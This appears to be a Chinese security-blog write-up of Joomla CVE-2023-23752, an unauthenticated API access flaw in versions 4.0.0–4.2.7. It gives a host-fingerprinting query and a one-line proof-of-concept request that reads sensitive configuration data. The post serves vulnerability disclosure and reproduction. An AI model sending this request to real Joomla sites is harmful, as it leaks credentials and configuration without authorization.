Joomla application 未授权访问漏洞 #CVE-2023-23752

漏洞描述

Joomla 存在未授权访问漏洞,攻击者通过覆盖 public 值绕过限制,访问部分API获取敏感数据。

漏洞影响

Joomla 4.0.0 ~ 4.2.7

网络测绘

app=”Joomla”

漏洞复现

登陆页面

20240404145811481-68747470733a2f2f63646e2e6e6c61726b2e636f6d2f79757175652f302f323032332f706e672f323131373733302f313637383234323435343030392d39353834303061612d646339312d343464652d616133632d3334616437383362396532612e706e67

验证POC

/api/index.php/v1/config/application?public=true

20240404145851914-68747470733a2f2f63646e2e6e6c61726b2e636f6d2f79757175652f302f323032332f706e672f323131373733302f313637383234323437363233392d33383665376134392d383762322d343931392d613261632d3432393333316266343261312e706e67

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容